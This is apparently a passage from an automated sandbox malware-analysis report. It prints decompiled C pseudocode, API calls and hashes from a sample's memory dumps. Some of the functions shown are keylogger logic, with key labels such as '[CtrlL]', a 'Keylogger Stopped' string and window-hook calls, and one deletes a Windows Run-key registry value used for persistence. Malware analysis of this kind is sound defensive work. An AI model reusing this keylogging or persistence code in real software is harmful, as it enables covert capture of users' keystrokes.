                                                                                                                                        • Part of subcall function 01301DA8: GetLocalTime.KERNEL32(?,?,00000000), ref: 01301DC1
                                                                                                                                        • Part of subcall function 01301DA8: wsprintfW.USER32 ref: 01301E4B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog$HookLocalTimeUnhookWindowswsprintf
                                                                                                                                      • String ID: Keylogger Stopped
                                                                                                                                      • API String ID: 3499953215-1543627373
                                                                                                                                      • Opcode ID: c7d38210d539fe3d3e02bdcfdae10817bad1e14b922c7979aab24e4fdb9df418
                                                                                                                                      • Instruction ID: 0d26bdbf955d31aaabb9ca167d5bae7d37c9aaf6249755b4e0cde07b43b47355
                                                                                                                                      • Opcode Fuzzy Hash: c7d38210d539fe3d3e02bdcfdae10817bad1e14b922c7979aab24e4fdb9df418
                                                                                                                                      • Instruction Fuzzy Hash: 20F08C319003919BEB26BB6CC0297EDBBF4AF2130CF44054DC082225D9DBB59649C791
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 66%
                                                                                                                                      			E0130231D(void* __ecx, void* __edx, void* __edi) {
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t4;
                                                                                                                                      				signed int _t7;
                                                                                                                                      				void* _t8;
                                                                                                                                      				void* _t10;
                                                                                                                                      				void* _t11;
                                                                                                                                      				void* _t13;
                                                                                                                                      				void* _t15;
                                                                                                                                      
                                                                                                                                      				_t11 = __edi;
                                                                                                                                      				_t10 = __edx;
                                                                                                                                      				_push(__ecx);
                                                                                                                                      				_t13 = __ecx;
                                                                                                                                      				_t7 = GetKeyState(0x12) & 0x0000ffff;
                                                                                                                                      				_t4 =  *((intOrPtr*)(_t13 + 0x54)) - 0xa2;
                                                                                                                                      				if(_t4 == 0) {
                                                                                                                                      					__eflags = _t7;
                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                      						_t8 = _t15 - 0x18;
                                                                                                                                      						_push("[CtrlL]");
                                                                                                                                      						goto L5;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t4 = _t4 - 1;
                                                                                                                                      					_t19 = _t4;
                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                      						_t8 = _t15 - 0x18;
                                                                                                                                      						_push("[CtrlR]");
                                                                                                                                      						L5:
                                                                                                                                      						E01302917(_t8, _t10);
                                                                                                                                      						_t4 = E013017B2(_t13, _t10, _t11, _t19);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t4;
                                                                                                                                      			}











                                                                                                                                      0x0130231d
                                                                                                                                      0x0130231d
                                                                                                                                      0x01302320
                                                                                                                                      0x01302324
                                                                                                                                      0x0130232c
                                                                                                                                      0x01302332
                                                                                                                                      0x01302337
                                                                                                                                      0x0130234a
                                                                                                                                      0x0130234d
                                                                                                                                      0x01302352
                                                                                                                                      0x01302354
                                                                                                                                      0x00000000
                                                                                                                                      0x01302354
                                                                                                                                      0x01302339
                                                                                                                                      0x01302339
                                                                                                                                      0x01302339
                                                                                                                                      0x0130233c
                                                                                                                                      0x01302341
                                                                                                                                      0x01302343
                                                                                                                                      0x01302359
                                                                                                                                      0x01302359
                                                                                                                                      0x01302360
                                                                                                                                      0x01302360
                                                                                                                                      0x0130233c
                                                                                                                                      0x01302367

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: State
                                                                                                                                      • String ID: [CtrlL]$[CtrlR]
                                                                                                                                      • API String ID: 1649606143-2446555240
                                                                                                                                      • Opcode ID: 34a5ea8cdcfbdfc803e1248dd02ca0d148f2526c9f67474b4d20f3174f693b82
                                                                                                                                      • Instruction ID: 32b2864f89b5b16875f4f4461bfdb5845bd18aca93ac00189f5e2e7840d4458b
                                                                                                                                      • Opcode Fuzzy Hash: 34a5ea8cdcfbdfc803e1248dd02ca0d148f2526c9f67474b4d20f3174f693b82
                                                                                                                                      • Instruction Fuzzy Hash: 0CE0483170022557CA26357F9A3E77B7A9CD78255CF40019DE847876C5EA95D91043D2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                      			E0130623E(void* __ecx, short* _a4) {
                                                                                                                                      				void* _v8;
                                                                                                                                      
                                                                                                                                      				_push(__ecx);
                                                                                                                                      				if(RegOpenKeyExW(__ecx, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 2,  &_v8) != 0 || RegDeleteValueW(_v8, _a4) != 0) {
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					return 1;
                                                                                                                                      				}
                                                                                                                                      			}




                                                                                                                                      0x01306241
                                                                                                                                      0x01306258
                                                                                                                                      0x01306271
                                                                                                                                      0x0130626a
                                                                                                                                      0x0130626d
                                                                                                                                      0x0130626d

                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00000002,00000001,80000002,?,013054A0,00000000,?,0132F948,00000001), ref: 01306250
                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000001,0132F948,?,013054A0,00000000,?,0132F948,00000001), ref: 01306260
                                                                                                                                      Strings
                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0130624A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DeleteOpenValue
                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Run\
                                                                                                                                      • API String ID: 2654517830-243400593
                                                                                                                                      • Opcode ID: 959556d94123fe0ea130e6c538a7ac254ac636a715524c892c064171e7310bbd
                                                                                                                                      • Instruction ID: 0c607bf24310aa4bd8b11d5747dc5a08c8a0a81f340b07bc10f71a44048a5d69
                                                                                                                                      • Opcode Fuzzy Hash: 959556d94123fe0ea130e6c538a7ac254ac636a715524c892c064171e7310bbd
                                                                                                                                      • Instruction Fuzzy Hash: E0E0EC74248208BADF329FA1DD06F9A77AC9B01F88F004058F905E5196D266D920A760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                      			E013096AD(intOrPtr _a4) {
                                                                                                                                      				char _v16;
                                                                                                                                      				intOrPtr _t8;
                                                                                                                                      				char* _t10;
                                                                                                                                      
                                                                                                                                      				_t10 =  &_v16;
                                                                                                                                      				E01309630(_t10, _a4);
                                                                                                                                      				E0130C79F( &_v16, 0x132bc34);
                                                                                                                                      				asm("int3");
                                                                                                                                      				_t8 =  *((intOrPtr*)(_t10 + 4));
                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                      					return "Unknown exception";
                                                                                                                                      				}
                                                                                                                                      				return _t8;
                                                                                                                                      			}






                                                                                                                                      0x013096b3
                                                                                                                                      0x013096b9
                                                                                                                                      0x013096c7
                                                                                                                                      0x013096cc
                                                                                                                                      0x013096cd
                                                                                                                                      0x013096d2
                                                                                                                                      0x00000000
                                                                                                                                      0x013096d4
                                                                                                                                      0x013096d9

                                                                                                                                      APIs
                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 013096B9
                                                                                                                                        • Part of subcall function 01309630: std::exception::exception.LIBCONCRT ref: 0130963D
                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 013096C7
                                                                                                                                        • Part of subcall function 0130C79F: RaiseException.KERNEL32(?,?,013096AC,00000000,?,?,?,?,?,?,?,013096AC,00000000,0132BBF8,?), ref: 0130C7FF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                      • String ID: Unknown exception
                                                                                                                                      • API String ID: 1586462112-410509341
                                                                                                                                      • Opcode ID: d61ed04d1f2bb61aeb1ff91650df39406addc446824d6822a1fa3c523f979065
                                                                                                                                      • Instruction ID: 4c437fb14c8059b007d6b9801e2f283c085593ab14a6c8d8fc4e51afc4f6a7eb
                                                                                                                                      • Opcode Fuzzy Hash: d61ed04d1f2bb61aeb1ff91650df39406addc446824d6822a1fa3c523f979065
                                                                                                                                      • Instruction Fuzzy Hash: 8FD0A738E0011C77CF01FAF9CC50A4DB7ACAE1051CBC08054E514D7181E770E519C785
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0131EE6B(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                                                                                                                                      				char* _v8;
                                                                                                                                      				int _v12;
                                                                                                                                      				char _v16;
                                                                                                                                      				char _v24;
                                                                                                                                      				char _v28;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				char _t34;
                                                                                                                                      				int _t35;
                                                                                                                                      				int _t38;
                                                                                                                                      				long _t39;
                                                                                                                                      				char* _t42;
                                                                                                                                      				int _t44;
                                                                                                                                      				int _t47;
                                                                                                                                      				int _t53;
                                                                                                                                      				intOrPtr _t55;
                                                                                                                                      				void* _t56;
                                                                                                                                      				char* _t57;
                                                                                                                                      				char* _t62;
                                                                                                                                      				char* _t63;
                                                                                                                                      				void* _t64;
                                                                                                                                      				int _t65;
                                                                                                                                      				short* _t67;
                                                                                                                                      				short* _t68;
                                                                                                                                      				int _t69;
                                                                                                                                      				intOrPtr* _t70;
                                                                                                                                      
                                                                                                                                      				_t64 = __edx;
                                                                                                                                      				_t53 = _a12;
                                                                                                                                      				_t67 = _a4;
                                                                                                                                      				_t68 = 0;
                                                                                                                                      				if(_t67 == 0) {
                                                                                                                                      					L3:
                                                                                                                                      					if(_a8 != _t68) {
                                                                                                                                      						E0130E1A2(_t53,  &_v28, _t64, _a16);
                                                                                                                                      						_t34 = _v24;
                                                                                                                                      						__eflags = _t67;
                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                      							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                                                                                                                                      							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                                                                                                                                      								_t69 = _t68 | 0xffffffff;
                                                                                                                                      								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                                                                                                                                      								__eflags = _t35;
                                                                                                                                      								if(_t35 != 0) {
                                                                                                                                      									L29:
                                                                                                                                      									_t28 = _t35 - 1; // -1
                                                                                                                                      									_t69 = _t28;
                                                                                                                                      									L30:
                                                                                                                                      									__eflags = _v16;
                                                                                                                                      									if(_v16 != 0) {
                                                                                                                                      										_t55 = _v28;
                                                                                                                                      										_t31 = _t55 + 0x350;
                                                                                                                                      										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                                                                                                                                      										__eflags =  *_t31;
                                                                                                                                      									}
                                                                                                                                      									return _t69;
                                                                                                                                      								}
                                                                                                                                      								 *((intOrPtr*)(E01313CD1())) = 0x2a;
                                                                                                                                      								goto L30;
                                                                                                                                      							}
                                                                                                                                      							_t70 = _a8;
                                                                                                                                      							_t56 = _t70 + 1;
                                                                                                                                      							do {
                                                                                                                                      								_t38 =  *_t70;
                                                                                                                                      								_t70 = _t70 + 1;
                                                                                                                                      								__eflags = _t38;
                                                                                                                                      							} while (_t38 != 0);
                                                                                                                                      							_t69 = _t70 - _t56;
                                                                                                                                      							goto L30;
                                                                                                                                      						}
                                                                                                                                      						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                                                                                                                                      						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                                                                                                                                      							_t69 = _t68 | 0xffffffff;
                                                                                                                                      							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                                                                                                                                      							__eflags = _t35;
                                                                                                                                      							if(_t35 != 0) {
                                                                                                                                      								goto L29;
                                                                                                                                      							}
                                                                                                                                      							_t39 = GetLastError();
                                                                                                                                      							__eflags = _t39 - 0x7a;
                                                                                                                                      							if(_t39 != 0x7a) {
                                                                                                                                      								L21:
                                                                                                                                      								 *((intOrPtr*)(E01313CD1())) = 0x2a;
                                                                                                                                      								 *_t67 = 0;
                                                                                                                                      								goto L30;
                                                                                                                                      							}
                                                                                                                                      							_t42 = _a8;
                                                                                                                                      							_t57 = _t42;
                                                                                                                                      							_v8 = _t57;
                                                                                                                                      							_t65 = _t53;
                                                                                                                                      							__eflags = _t53;
                                                                                                                                      							if(_t53 == 0) {
                                                                                                                                      								L20:
                                                                                                                                      								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                                                                                                                                      								__eflags = _t44;
                                                                                                                                      								if(_t44 != 0) {
                                                                                                                                      									_t69 = _t44;
                                                                                                                                      									goto L30;
                                                                                                                                      								}
                                                                                                                                      								goto L21;
                                                                                                                                      							} else {
                                                                                                                                      								goto L15;
                                                                                                                                      							}
                                                                                                                                      							while(1) {
                                                                                                                                      								L15:
                                                                                                                                      								_t45 =  *_t57;
                                                                                                                                      								_v12 = _t65 - 1;
                                                                                                                                      								__eflags =  *_t57;
                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t47 = E01313D0A(__eflags, _t45 & 0x000000ff,  &_v24);
                                                                                                                                      								_t62 = _v8;
                                                                                                                                      								__eflags = _t47;
                                                                                                                                      								if(_t47 == 0) {
                                                                                                                                      									L18:
                                                                                                                                      									_t65 = _v12;
                                                                                                                                      									_t57 = _t62 + 1;
                                                                                                                                      									_v8 = _t57;
                                                                                                                                      									__eflags = _t65;
                                                                                                                                      									if(_t65 != 0) {
                                                                                                                                      										continue;
                                                                                                                                      									}
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t62 = _t62 + 1;
                                                                                                                                      								__eflags =  *_t62;
                                                                                                                                      								if( *_t62 == 0) {
                                                                                                                                      									goto L21;
                                                                                                                                      								}
                                                                                                                                      								goto L18;
                                                                                                                                      							}
                                                                                                                                      							_t42 = _a8;
                                                                                                                                      							goto L20;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _t53;
                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                      							goto L30;
                                                                                                                                      						}
                                                                                                                                      						_t63 = _a8;
                                                                                                                                      						while(1) {
                                                                                                                                      							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                                                                                                                                      							__eflags =  *(_t68 + _t63);
                                                                                                                                      							if( *(_t68 + _t63) == 0) {
                                                                                                                                      								goto L30;
                                                                                                                                      							}
                                                                                                                                      							_t68 =  &(_t68[0]);
                                                                                                                                      							_t67 =  &(_t67[1]);
                                                                                                                                      							__eflags = _t68 - _t53;
                                                                                                                                      							if(_t68 < _t53) {
                                                                                                                                      								continue;
                                                                                                                                      							}
                                                                                                                                      							goto L30;
                                                                                                                                      						}
                                                                                                                                      						goto L30;
                                                                                                                                      					}
                                                                                                                                      					 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      					return E013110B9() | 0xffffffff;
                                                                                                                                      				}
                                                                                                                                      				if(_t53 != 0) {
                                                                                                                                      					 *_t67 = 0;
                                                                                                                                      					goto L3;
                                                                                                                                      				}
                                                                                                                                      				return 0;
                                                                                                                                      			}




























                                                                                                                                      0x0131ee6b
                                                                                                                                      0x0131ee74
                                                                                                                                      0x0131ee79
                                                                                                                                      0x0131ee7c
                                                                                                                                      0x0131ee80
                                                                                                                                      0x0131ee8f
                                                                                                                                      0x0131ee92
                                                                                                                                      0x0131eeb2
                                                                                                                                      0x0131eeb7
                                                                                                                                      0x0131eeba
                                                                                                                                      0x0131eebc
                                                                                                                                      0x0131ef8a
                                                                                                                                      0x0131ef90
                                                                                                                                      0x0131efa5
                                                                                                                                      0x0131efb1
                                                                                                                                      0x0131efb7
                                                                                                                                      0x0131efb9
                                                                                                                                      0x0131efc8
                                                                                                                                      0x0131efc8
                                                                                                                                      0x0131efc8
                                                                                                                                      0x0131efcb
                                                                                                                                      0x0131efcb
                                                                                                                                      0x0131efcf
                                                                                                                                      0x0131efd1
                                                                                                                                      0x0131efd4
                                                                                                                                      0x0131efd4
                                                                                                                                      0x0131efd4
                                                                                                                                      0x0131efd4
                                                                                                                                      0x00000000
                                                                                                                                      0x0131efdb
                                                                                                                                      0x0131efc0
                                                                                                                                      0x00000000
                                                                                                                                      0x0131efc0
                                                                                                                                      0x0131ef92
                                                                                                                                      0x0131ef95
                                                                                                                                      0x0131ef98
                                                                                                                                      0x0131ef98
                                                                                                                                      0x0131ef9a
                                                                                                                                      0x0131ef9b
                                                                                                                                      0x0131ef9b
                                                                                                                                      0x0131ef9f
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef9f
                                                                                                                                      0x0131eec2
                                                                                                                                      0x0131eec8
                                                                                                                                      0x0131eef5
                                                                                                                                      0x0131ef01
                                                                                                                                      0x0131ef07
                                                                                                                                      0x0131ef09
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef0f
                                                                                                                                      0x0131ef15
                                                                                                                                      0x0131ef18
                                                                                                                                      0x0131ef74
                                                                                                                                      0x0131ef79
                                                                                                                                      0x0131ef81
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef81
                                                                                                                                      0x0131ef1a
                                                                                                                                      0x0131ef1d
                                                                                                                                      0x0131ef1f
                                                                                                                                      0x0131ef22
                                                                                                                                      0x0131ef24
                                                                                                                                      0x0131ef26
                                                                                                                                      0x0131ef5c
                                                                                                                                      0x0131ef6a
                                                                                                                                      0x0131ef70
                                                                                                                                      0x0131ef72
                                                                                                                                      0x0131ef86
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef86
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef28
                                                                                                                                      0x0131ef28
                                                                                                                                      0x0131ef28
                                                                                                                                      0x0131ef2b
                                                                                                                                      0x0131ef2e
                                                                                                                                      0x0131ef30
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef3a
                                                                                                                                      0x0131ef41
                                                                                                                                      0x0131ef44
                                                                                                                                      0x0131ef46
                                                                                                                                      0x0131ef4e
                                                                                                                                      0x0131ef4e
                                                                                                                                      0x0131ef51
                                                                                                                                      0x0131ef52
                                                                                                                                      0x0131ef55
                                                                                                                                      0x0131ef57
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef57
                                                                                                                                      0x0131ef48
                                                                                                                                      0x0131ef49
                                                                                                                                      0x0131ef4c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef4c
                                                                                                                                      0x0131ef59
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ef59
                                                                                                                                      0x0131eeca
                                                                                                                                      0x0131eecc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eed2
                                                                                                                                      0x0131eed5
                                                                                                                                      0x0131eed9
                                                                                                                                      0x0131eedc
                                                                                                                                      0x0131eee0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eee6
                                                                                                                                      0x0131eee7
                                                                                                                                      0x0131eeea
                                                                                                                                      0x0131eeec
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eeee
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eed5
                                                                                                                                      0x0131ee99
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eea4
                                                                                                                                      0x0131ee86
                                                                                                                                      0x0131ee8c
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ee8c
                                                                                                                                      0x0131efe3

                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0131EF01
                                                                                                                                      • GetLastError.KERNEL32 ref: 0131EF0F
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 0131EF6A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                      • Opcode ID: 3fff9e804ba05994c3114c03a75040779d94b178d29d4da8d8bacf106fabb708
                                                                                                                                      • Instruction ID: ee0f9a3ec8c8286d22b6a052a95fb81a7202777ead57130a868b7c7ed889e3f7
                                                                                                                                      • Opcode Fuzzy Hash: 3fff9e804ba05994c3114c03a75040779d94b178d29d4da8d8bacf106fabb708
                                                                                                                                      • Instruction Fuzzy Hash: 3541273060025AEFDF2B9F6CC844ABABFA8EF41328F264178FD5957199D7329904C750
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%